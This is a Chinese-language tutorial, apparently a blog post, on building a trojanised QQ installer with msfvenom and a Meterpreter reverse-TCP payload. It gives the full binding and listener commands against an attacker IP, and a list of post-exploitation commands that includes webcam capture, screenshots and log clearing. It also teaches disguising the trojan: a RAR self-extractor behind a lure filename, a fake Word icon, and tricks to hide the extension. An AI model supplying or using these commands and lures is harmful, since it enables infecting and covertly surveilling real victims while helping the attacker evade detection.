msf之木馬程式

捆綁木馬

這里使用的是Kali linux虛擬機
攻擊機ip是192.168.0.108
靶機ip是192.168.177.134

生成木馬檔案

首先上傳一個正常的安裝包到kali里面

我這里下了一個QQ

把它上傳到了root/dy/路徑下

然后開始捆綁

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe

-p：指定后面的payload

windows/meterpreter/reverse_tcp：申明這是一個windows系統下的一個反彈tcp

LHOST=192.168.0.108,：設定反彈回來的ip，即你的kali的ip地址

還可以設定回傳的埠，這里就不設定了，默認回傳埠是4444

-f： 代表要捆綁的檔案型別，這里是一個exe檔案

-x：指定你要捆綁的檔案的路徑及檔案名，這里我選擇的是root/dy/里的PCQQ2020.exe

-o：指定生成的木馬檔案的路徑及檔案名，這里我把它保存在原路徑里，名字就叫QQ.exe

生成完畢

附：msfvenom介紹

msfvenom簡介

msfvenom是msfpayload,msfencode的結合體，可利用msfvenom生成木馬程式,并在目標機上執行,配合meterpreter在本地監聽上線，
msfvenom重要引數：（可以使用msfvenom -h查看所有引數）

-p payload設定
-e 編碼設定
-a 系統結構，默認x86
-s payload最大大小
-i 編碼次數
-f 生成檔案格式

msfvenom生成

生成payload，有有兩個必須的選項：-p和-f
使用-p來指定要使用的payload，

./msfvenom –l payloads      //查看所有msf可用的payload串列

使用-f來指定payload的輸出格式

./msfvenom -p windows/meterpreter/bind_tcp -f exe

./msfvenom --help –formats      //查看msf支持的輸出格式

一個典型的msfvenom使用舉例如下：

$./msfvenom -p windows/meterpreter/reverse_tcplhost=[Attacker IP]lport=4444 -f  exe -o /tmp/my_payload.exe

exploit/multi/handler模塊簡介

msf>use exploit/multi/handler
#使用exploit/multi/handler監聽連入的backdoor
msf exploit(handler)>set payload windows/meterpreter/reverse_http
#設定對應的payload，
Msf exploit(handler)>show options
#顯示所有的設定如果需要的話，可能還需要將LHOST，LPORT,設定成與payload中相同的地址和埠，

設定監聽反彈

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

發送木馬

接下來將木馬檔案發送給目標，至于怎么讓目標信任你，安裝你發過去的檔案，就看你的社工能力了，
作為一個遵守中華人民共和國網路安全法的四有青年，我當然是選擇把木馬檔案發送到另一臺windows系統的虛擬機里面，

先將木馬檔案發到物理機上，然后再從物理機上傳到虛擬機上

然后雙擊運行QQ
kali就已經連接到了靶機

查看對方的ip

ipconfig

查看對方目錄

dir

截圖

screenshot

就會截一張當前靶機的圖片，保存的路徑會提示出來的

開啟攝像頭

因為虛擬機沒開攝像頭，所以失敗

附：Meterpreter常用命令

info                    #查看已有模塊資訊
getuid                  #查看權限
getpid                  #獲取當前行程的pid
sysinfo                 #查看目標機系統資訊
ps                      #查看當前活躍行程
kill <PID值>            #殺死行程
reboot / shutdown       #重啟/關機shell #進入目標機cmd shell 
webcam_list             #查看攝像頭
webcam_snap             #通過攝像頭拍照
webcam_stream           #通過攝像頭開啟視頻
execute                 #在目標機中執行檔案execute -H -i -f 
cmd.exe                 #創建新行程cmd.exe，-H不可見，-i互動
migrate <pid值>         #將Meterpreter會話移植到指定pid值行程中
clearav                 #清除windows中的應用程式日志、系統日志、安全日志
enumdesktops            #查看可用的桌面
getdesktop              #獲取當前meterpreter 關聯的桌面
set_desktop             #設定meterpreter關聯的桌面 -h查看幫助
screenshot              #截屏
use espia               #或者使用espia模塊截屏 然后輸入screengrab
run vnc                 #使用vnc遠程桌面連接

進一步獲取權限

shell

目標主機就是你的了

如果對方就是不下載安裝你發的檔案怎么辦？
RAR有一個自解壓的功能
我們可以利用這一點來達到目的
有兩個檔案，一個是剛剛生成的木馬檔案，一個是一個txt檔案
全部選中，右擊添加到壓縮檔案，注意這里一定要用rar壓縮方式

常規里面

檔案名可以是一個傭訓性的，比如學妹聯系方式.txt，這里的txt不是檔案型別，是檔案名的一部分，它的檔案型別還是exe
壓縮格式RAR，選擇創建自解壓格式壓縮檔案

高級選項中，有個自解壓選項
選中它
常規：解壓路徑隨便填一個，這里放在C盤根目錄

設定：解壓前運行txt檔案，解壓后運行QQ.exe檔案

模式：解壓時隱藏所有資訊

然后確定，確定，再確定

就會解壓出一個名為學妹聯系方式的檔案
將這個檔案發出去

同樣設定監聽反彈，與第一部分一樣

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 4444
run

當打開這個檔案時，顯示的是txt檔案里的內容，但是QQ.exe也暗中執行了，
當然，實際情況中得換一個輕量級的檔案，否則別人看到一個txt檔案有80多mb，肯定會懷疑的，

偽裝

如何偽裝的更像一點呢？
這里以QQ.exe舉例

介紹兩個工具

BeCyIconGrabber，這個工具可以提取檔案圖示，
這里提取了一個word檔案的圖示

Resource Hacker
這個工具能修改檔案圖示
將它的圖示換成word檔案的圖示

這是更改圖示后與更改前的區別

因為需要管理員權限才能執行，所以多了個盾牌的標記，
換成其它的檔案就能避免出現此類情況

當然，因為微軟默認是隱藏后綴名的，一般情況下非專業人士都不會修改成顯示后綴名的，所以一般情況下被攻擊者看不到后綴的，如下圖：

但是，萬一被攻擊者顯示后綴名了呢？

也有辦法偽裝
把檔案名取得長一點，windows就會只顯示一部分內容，將后面部分的檔案名隱藏，如下：